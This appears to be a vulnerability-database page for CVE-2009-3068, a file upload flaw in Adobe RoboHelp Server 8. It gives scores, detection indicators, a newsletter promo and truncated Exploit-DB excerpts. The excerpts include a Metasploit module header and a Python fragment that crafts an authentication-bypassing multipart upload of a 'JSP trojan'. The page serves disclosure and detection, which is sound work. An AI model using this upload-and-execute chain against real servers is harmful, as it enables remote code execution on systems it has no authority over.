CVE-2009-3068
published 2009-09-04CVE-2009-3068: Unrestricted file upload vulnerability in the RoboHelpServer Servlet (robohelp/server) in Adobe RoboHelp Server 8 allows remote attackers to execute arbitrary…
PriorityP180critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
78.18%
99.5th percentile
Unrestricted file upload vulnerability in the RoboHelpServer Servlet (robohelp/server) in Adobe RoboHelp Server 8 allows remote attackers to execute arbitrary code by uploading a Java Archive (.jsp) file during a PUBLISH action, then accessing it via a direct request to the file in the robohelp/robo/reserved/web directory under its sessionid subdirectory, as demonstrated by the vd_adobe module in VulnDisco Pack Professional 8.7 through 8.11.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | robohelp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /robohelp/server?PUBLISH=<uid> with multipart/form-data boundary and UID header uploading .jsp file↗
- →Detect POST requests to /robohelp/server with PUBLISH parameter and multipart/form-data content type containing a .jsp file upload — this is the exploitation upload stage. ↗
- →Detect GET requests to /robohelp/robo/reserved/web/<sessionid>/*.jsp — this is the second-stage payload execution request. ↗
- →Look for the custom HTTP header 'UID' in requests to /robohelp/server — this header is used by the exploit to bypass authentication. ↗
- →Inspect multipart/form-data uploads to /robohelp/server for files with Content-Type: application/x-java-archive and .jsp extensions — indicates malicious JSP trojan upload. ↗
- →Server responses containing a 'sessionid' header following a POST to /robohelp/server?PUBLISH= indicate a successful exploitation upload stage. ↗
- →The Metasploit module targets Apache-Coyote servers; correlate Apache-Coyote server fingerprint with RoboHelp-specific URI patterns to prioritize alerting. ↗
- ·The exploit uses a randomly generated UID value and random 8-character uppercase .jsp filename in the Metasploit module, so filename and UID header values will vary per session — do not rely on static values like '1234' or 'test.jsp' for detection. ↗
- ·The default target port is 8080, but the vulnerability is in the servlet path itself — detection rules should not be port-restricted as deployments may vary. ↗
- ·Exploitation requires two sequential HTTP requests: a POST to upload the JSP, followed by a GET to execute it — single-request detection will miss the full attack chain. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)
exploitdb·2010-11-24
CVE-2009-3068 Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)
Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)
---
##
# $Id: adobe_robohelper_authbypass.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe RoboHelp Server 8 Arbitrary File Upload and Execute',
'Description' => %q{
This module exploits an authentication bypass vulnerability which
allows remote attackers to upload and execute arbitrary code.
},
'Author'
Exploit-DB
Adobe RoboHelp Server 8 - Authentication Bypass
exploitdb·2009-09-03
CVE-2009-3068 Adobe RoboHelp Server 8 - Authentication Bypass
Adobe RoboHelp Server 8 - Authentication Bypass
---
source: https://www.securityfocus.com/bid/36245/info
Adobe RoboHelp Server is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to upload and execute arbitrary code with SYSTEM-level privileges.
RoboHelp Server 8.0 is affected; other versions may also be vulnerable.
b="-----------------------------111\r\n"
b+="Content-Disposition: form-data; name=\"filename\"; filename=\"test.jsp\"\r\n"
b+="Content-Type: application/x-java-archive\r\n\r\n"
b+=data # source code of our JSP trojan here
b+="\r\n"
b+="-----------------------------111--\r\n"
s="POST /robohelp/server?PUBLISH=1 HTTP/1.1\r\n"
s+="Host: %s:%d\r\n"%(host, port)
s+="User-Agent: Mozilla\r\n"
s+="UID: 1234\r\n"
s+="Content-Type: multipart/form-d
Metasploit
Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
metasploit
Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
This module exploits an authentication bypass vulnerability which allows remote attackers to upload and execute arbitrary code.
No writeups or analysis indexed.
http://blogs.adobe.com/psirt/2009/09/potential_robohelp_server_8_is.htmlhttp://intevydis.com/vd-list.shtmlhttp://secunia.com/advisories/36467http://twitter.com/elegerov/statuses/3727947465http://twitter.com/elegerov/statuses/3737538715http://twitter.com/elegerov/statuses/3737725344http://www.adobe.com/support/security/bulletins/apsb09-14.htmlhttp://www.intevydis.com/blog/?p=26http://www.intevydis.com/blog/?p=69http://www.securityfocus.com/archive/1/506687/100/0/threadedhttp://www.securityfocus.com/bid/36245http://www.zerodayinitiative.com/advisories/ZDI-09-066http://blogs.adobe.com/psirt/2009/09/potential_robohelp_server_8_is.htmlhttp://intevydis.com/vd-list.shtmlhttp://secunia.com/advisories/36467http://twitter.com/elegerov/statuses/3727947465http://twitter.com/elegerov/statuses/3737538715http://twitter.com/elegerov/statuses/3737725344http://www.adobe.com/support/security/bulletins/apsb09-14.htmlhttp://www.intevydis.com/blog/?p=26http://www.intevydis.com/blog/?p=69http://www.securityfocus.com/archive/1/506687/100/0/threadedhttp://www.securityfocus.com/bid/36245http://www.zerodayinitiative.com/advisories/ZDI-09-066
2009-09-04
Published